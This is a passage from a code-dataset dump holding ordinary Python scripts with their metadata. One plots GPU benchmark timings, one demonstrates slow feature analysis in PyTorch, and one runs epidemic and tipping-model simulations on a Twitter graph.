"line_number": 141, "usage_type": "call"}, {"api_name": "telemetry.timeline.tracing_config", "line_number": 141, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 135, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 135, "usage_type": "name"}, {"api_name": "devil.android.app_ui.AppUi", "line_number": 152, "usage_type": "attribute"}, {"api_name": "devil.android.app_ui", "line_number": 152, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 148, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 148, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 156, "usage_type": "attribute"}, {"api_name": 
"telemetry.testing.browser_test_case", "line_number": 156, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 170, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 175, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 175, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 180, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 185, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 185, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 191, "usage_type": "attribute"}, {"api_name": "mock.MagicMock", "line_number": 193, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 194, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser.Browser", "line_number": 201, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser", "line_number": 201, "usage_type": "name"}, {"api_name": "telemetry.internal.browser.browser.Browser", "line_number": 212, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser", "line_number": 212, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 218, "usage_type": "attribute"}, {"api_name": "telemetry.testing.options_for_unittests.GetCopy", "line_number": 221, "usage_type": "call"}, {"api_name": "telemetry.testing.options_for_unittests", "line_number": 221, "usage_type": "name"}, {"api_name": "telemetry.internal.browser.browser_finder.FindBrowser", "line_number": 222, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser_finder", "line_number": 222, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 249, "usage_type": "call"}, {"api_name": "tempfile.tempdir", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 254, "usage_type": "call"}, {"api_name": "tempfile.tempdir", "line_number": 254, "usage_type": "attribute"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 244, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 244, "usage_type": "name"}, {"api_name": "telemetry.decorators.Isolated", "line_number": 247, "usage_type": "attribute"}, {"api_name": "telemetry.decorators", "line_number": 247, "usage_type": "name"}]} +{"seq_id": "31641158479", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport plotting\n\ntheta = [0.1, 0.2, 0.3, 0.4, 0.5, 0.7, 0.9]\ntypes = []\nwith open('timings.csv', 'r') as file:\n reader = csv.reader(file)\n next(reader, None) # skip header\n for row in reader:\n types.append(row[0])\n\ntimings = np.genfromtxt('timings.csv', delimiter=',', usecols=(1, 2, 3, 4, 5, 6, 7))\ntimings_gravity = np.genfromtxt('timings_gravity.csv', delimiter=',', usecols=(1, 2, 3, 4, 5, 6, 7))\n\n# Remove CPU timings\nindices_to_delete = [types.index('CPU'), types.index('CPU-SMP'), types.index('CPU-SMP-SP')]\ntimings = np.delete(timings, indices_to_delete, 0)\ntimings_gravity = np.delete(timings_gravity, indices_to_delete, 
0)\ntypes.remove('CPU')\ntypes.remove('CPU-SMP')\ntypes.remove('CPU-SMP-SP')\ngpu_index = types.index('GPU-SMP')\n\nfig, ax = plotting.make_fig(size=(5, 3.8))\n\nbar_width = 0.70 / len(types)\nspacer = 0.1 * bar_width\nalpha = 0.7\nindices = np.arange(len(theta))\noffsets = np.arange(len(types)) * bar_width + spacer\ncolors = ('red', 'orange', 'darkviolet', 'green', 'coral', 'blue', 'darkgrey')\n\ngpu_time = timings[gpu_index, :]\nscaled_timings = timings / gpu_time\nscaled_timings_gravity = timings_gravity / gpu_time\nnon_gravity_timings = scaled_timings - scaled_timings_gravity\ngrav_frac = timings_gravity / timings\n\nfor i in indices:\n plt.bar(i + offsets, non_gravity_timings[:, i], width=bar_width, alpha=alpha, color=colors)\n plt.bar(i + offsets, scaled_timings_gravity[:, i], width=bar_width, alpha=alpha, color='white', edgecolor=colors, bottom=non_gravity_timings[:, i], hatch='//')\n plt.text(i, 1.02 * scaled_timings[gpu_index, i], '{0:.2f}'.format(timings[gpu_index, i]), fontsize=8)\n \n for j in range(len(types)):\n y = non_gravity_timings[j, i] + 0.5 * scaled_timings_gravity[j, i]\n plt.text(i + j * 1.15 * bar_width, y, '{0:d}%'.format(int(100.0 * grav_frac[j, i])), fontsize=6, rotation=90.0)\n\nplt.legend(types, loc='upper center', ncol=3, fancybox=True, shadow=True, fontsize=8)\nl = ax.get_legend()\nfor i in range(len(types)):\n l.legendHandles[i].set_color(colors[i])\n\n# These muck up the legend, so leave them down here\ngrey = '0.4'\nplt.plot((0, len(theta)), (0.95, 0.95), color=grey, linewidth=0.9, alpha=0.2)\nplt.plot((0, len(theta)), (0.90, 0.90), color=grey, linewidth=0.9, alpha=0.2)\nplt.plot((0, len(theta)), (0.80, 0.80), color=grey, linewidth=0.9, alpha=0.2)\nplt.text(indices[-1] + 0.75, 0.65, 'Speedup', color=grey, fontsize=7, rotation=90.0)\nplt.text(indices[-1] + 0.75, 0.95, '5%', color=grey, fontsize=5)\nplt.text(indices[-1] + 0.75, 0.90, '10%', color=grey, fontsize=5)\nplt.text(indices[-1] + 0.75, 0.80, '20%', color=grey, fontsize=5)\n\nplt.xticks(indices, theta)\nplt.yticks(())\nplt.ylim((0.0, 1.3))\nplt.xlabel(r'$\\theta$ (opening angle)')\nplt.ylabel(r'$\\left\\langle t_{{\\rm step}}\\right\\rangle\\,(s)$')\n\nplotting.save_fig(fig, 'gpu-timings.png')\n", "repo_name": "hainest/ChaNGa_test", "sub_path": "benchmarking/plotGPUTimings.py", "file_name": "plotGPUTimings.py", "file_ext": "py", "file_size_in_byte": 2904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 20, "usage_type": "call"}, {"api_name": "plotting.make_fig", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.text", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "plotting.save_fig", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "24571187584", "text": "import math\nimport torch\nimport matplotlib.pyplot as plt\nimport sksfa\n\n\n# Time length\ntime_length = 2.0 * math.pi\n\n# Time step\ntime_step = 0.0001\n\n# Number of components to extract\nn_components = 2\n\n# Total number of samples in the timeseries\ntotal_points = time_length / time_step\n\n# Length to plot\nplot_length = 2.0 * math.pi\n\n# Number of points to plot\nplot_points = int(plot_length / time_step)\n\n# Time values\nts_gen = torch.arange(0, time_length, time_step)\nts = [t for t in ts_gen]\n\n# Generate the first signal\n# x1(t) = sin(t) + cos(11t)^2\nx1 = torch.tensor([[torch.sin(t) + torch.pow(torch.cos(11.0 * t), 2)] for t in ts_gen])\n\n# Generate the second signal\n# x2(t) = cos(11*t)\nx2 = torch.tensor([[torch.cos(11.0 * t)] for t in ts_gen])\n\n# Compute x\nx = torch.cat((x1, x2), dim=1)\nx = x - torch.mean(x, dim=0)\nx = x / torch.std(x, dim=0)\n\n# Plot the first signal\nsin_x = torch.tensor([[torch.sin(t)] for t in ts_gen])\nplt.plot(ts[:plot_points], x[:plot_points, 0].numpy(), color='r')\nplt.plot(ts[:plot_points], sin_x[:plot_points, 0], color='black')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.title(\"Input component 
x1(t)\")\nplt.show()\n\n# Plot the second signal\nplt.plot(ts[:plot_points], x[:plot_points, 1].numpy(), color='r')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.title(\"Input component x2(t)\")\nplt.show()\n\n# Plot in 2D space\nplt.plot(x[:plot_points, 1].numpy(), x[:plot_points, 0].numpy(), color='r')\nplt.xticks([-1, 0, 1])\nplt.yticks([-2, -1, 0, 1, 2])\nplt.xlabel(\"x2(t)\")\nplt.ylabel(\"x1(t)\")\nplt.title(\"Input trajectory x(t)\")\nplt.show()\n\n\n#\n# EXPANDED SIGNAL\n#\n\n\n# Compute the expanded signal z(t)\ndef h(u):\n    return torch.cat(\n        (\n            u,\n            torch.mul(u[:, 1], u[:, 1]).reshape(-1, 1),\n            torch.mul(u[:, 0], u[:, 0]).reshape(-1, 1),\n            torch.mul(u[:, 0], u[:, 1]).reshape(-1, 1)\n        ),\n        dim=1\n    )\n    # return u\n# end h\n\n\n# Compute expanded signal z\nz = h(x)\n\n# Plot expanded signal in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(z[:plot_points, 2], z[:plot_points, 1], z[:plot_points, 0], 'r')\nax.set_xlabel(\"z5\")\nax.set_xlim(-1, 2)\nax.set_ylabel(\"z2\")\nax.set_ylim(-1, 1)\nax.set_zlabel(\"z1\")\nax.set_zlim(-2, 2)\nplt.title(\"Expanded signal z(t)\")\nplt.show()\n\n\n#\n# WHITENING SIGNAL\n#\n\n# Compute the bias\nb = -torch.mean(z, dim=0)\n\n# Centered Z\nzm = z + b\n\n# Compute the covariance matrix of z\ncov_zm = torch.mm(zm.t(), zm) / total_points\n\n# Show the covariance matrix\nplt.imshow(cov_zm.numpy(), cmap='Greys')\nplt.title(\"Centered z covariance matrix\")\nplt.show()\n\n# Compute the eigenvectors and eigenvalues of the\n# covariance of zm\nD, U = torch.eig(cov_zm, eigenvectors=True)\n\n# Remove imaginary part and compute the diagonal matrix\nD = torch.diag(D[:, 0])\n\n# Compute S, the linear transformation to normalize the signal\n# S = L^-1/2 * Q^T\nS = torch.mm(torch.sqrt(torch.inverse(D)), U.t())\n\n# Normalize the expanded signal z with the linear transformation\n# zs = sqrt(L^-1) * Q^-1 * zm\nzs = torch.mm(S, zm.t()).t()\n\n# Print average of zs to check\n# centeredness\nprint(\"Average of zs : {}\".format(torch.mean(zs, dim=0)))\n\n# Compute the covariance matrix of zs\ncov_zsT = torch.mm(zs.t(), zs) / total_points\n\n# Show the new covariance matrix\nplt.imshow(cov_zsT.numpy(), cmap='Greys')\nplt.title(\"Sphered z covariance matrix\")\nplt.show()\n\n# Plot sphered expanded signal in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(zs[:plot_points, 2], zs[:plot_points, 1], zs[:plot_points, 0], 'r')\nax.set_xlabel(\"zs5\")\nax.set_xlim(-1, 2)\nax.set_ylabel(\"zs2\")\nax.set_ylim(-1, 1)\nax.set_zlabel(\"zs1\")\nax.set_zlim(-2, 2)\nplt.title(\"Sphered expanded signal zs(t)\")\nplt.show()\n\n\n#\n# TIME DERIVATIVES\n#\n\n\n# Compute the time derivative of zs\ndzs = (zs[1:] - zs[:-1]) / time_step\n\n# Covariance matrix of dzs\ncov_dzs = torch.mm(dzs.t(), dzs) / total_points\n\n# Compute eigen decomposition on time derivative\nL, V = torch.eig(cov_dzs, eigenvectors=True)\nprint(L)\n# Keep only the needed components\n# V = V[:, :n_components]\n\n# Compute W\nW = torch.mm(V.t(), S)\n\n\ndef g(u):\n    # To expanded form\n    hu = h(u)\n\n    # In component form\n    return torch.mm(W, (hu + b).t()).t()\n# end g_func\n\n\n# Invariant features\nsf = g(x)\n\nsfa_transformer = sksfa.SFA(n_components=2, )\nsf_x = sfa_transformer.fit_transform(zm.numpy())\n\n# Plot derivative and expanded signal, in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(zs[:plot_points, 2]*10.0, zs[:plot_points, 1]*10.0, zs[:plot_points, 0]*10.0, 
'r')\nax.plot3D(dzs[:plot_points, 2], dzs[:plot_points, 1], dzs[:plot_points, 0], 'b')\nax.set_xlabel(\"dx1x2\")\nax.set_xlim(-25, 25)\nax.set_ylabel(\"dx2\")\nax.set_ylim(-25, 25)\nax.set_zlabel(\"dx1\")\nax.set_zlim(-25, 25)\nplt.show()\n\n# Show components from home made SFA\nplt.title(\"Components from home made SFA\")\nplt.plot(ts[:plot_points], sf[:plot_points, 0].numpy(), color=(1.0, 0.0, 0.0, 0.5))\nplt.plot(ts[:plot_points], sf[:plot_points, 1].numpy(), color='g')\nplt.plot(ts[:plot_points], sf[:plot_points, 2].numpy(), color=(0.0, 0.0, 1.0, 0.5))\nplt.plot(ts[:plot_points], sf[:plot_points, 3].numpy(), 'black')\nplt.plot(ts[:plot_points], sf[:plot_points, 4].numpy(), color=(1.0, 1.0, 0.0, 0.5))\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.show()\n\n# Show components from sklearn\nplt.title(\"Components from sklearn SFA\")\nplt.plot(ts[:plot_points], sf_x[:plot_points, 0], 'r')\nplt.plot(ts[:plot_points], sf_x[:plot_points, 1], 'g')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.show()\n", "repo_name": "nschaetti/EchoTorch", "sub_path": "examples/features/independent_component_analysis.py", "file_name": "independent_component_analysis.py", "file_ext": "py", "file_size_in_byte": 5627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 408, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.pi", "line_number": 8, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.eig", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.diag", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.inverse", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.eig", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 192, "usage_type": "call"}, {"api_name": "sksfa.SFA", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.xticks", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 222, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 231, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}]} +{"seq_id": "12613564710", "text": "\nfrom random import randrange\nfrom tqdm import tqdm \nimport click\n\nfrom model import Graph\nfrom sir import SIR, S, I\nfrom tipping import TippingModel\n\n\ndef run(g, seed, model, parameter, target_state):\n\n model = model(parameter)\n model.set_graph(g)\n model.setup(S)\n model.node_states[seed] = I\n\n iters = 150\n for i in range(iters):\n model.iterate()\n# model.inform()\n\n df = model.history_to_df()\n number_of_infected = df.loc[iters, target_state]\n \n return number_of_infected\n \n\n@click.command()\n@click.option(\"-m\", \"--model_type\", default=\"SIR\")\ndef main(model_type):\n \n print(\"Creating graph .... 
\", end=\"\", flush=True)\n    g = Graph(\"twitter_data/twitter_combined.txt\")\n    print(\"ok\", flush=True)\n    print(\"Nodes:\", g.n_nodes)\n    print(\"Edges:\", g.edges.size) \n\n\n    if model_type == \"SIR\":\n        model = SIR\n        parameter = 0.1\n        target_state = \"R\"\n        repeat = 50\n    elif model_type == \"TippingModel\":\n        model = TippingModel\n        parameter = 0.1\n        target_state = \"Active\"\n        repeat = 1\n    \n    for _ in range(15):\n        seed = randrange(g.n_nodes)\n        number_of_infected = []\n        for _ in tqdm(range(repeat)):\n            number_of_infected.append(run(g, seed, model, parameter, target_state))\n        \n        print(g.node_numbers[seed], \":\", sum(number_of_infected)/len(number_of_infected))\n\n    \nif __name__ == \"__main__\":\n    main()\n", "repo_name": "PetraVidnerova/soil_playground", "sub_path": "test_model.py", "file_name": "test_model.py", "file_ext": "py", "file_size_in_byte": 1464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.set_graph", "line_number": 14, "usage_type": "call"}, {"api_name": "model.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "sir.S", "line_number": 15, "usage_type": "argument"}, {"api_name": "model.node_states", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sir.I", "line_number": 16, "usage_type": "name"}, {"api_name": "model.iterate", "line_number": 20, "usage_type": "call"}, {"api_name": "model.history_to_df", "line_number": 23, "usage_type": "call"}, {"api_name": "model.Graph", "line_number": 34, "usage_type": "call"}, {"api_name": "sir.SIR", "line_number": 41, 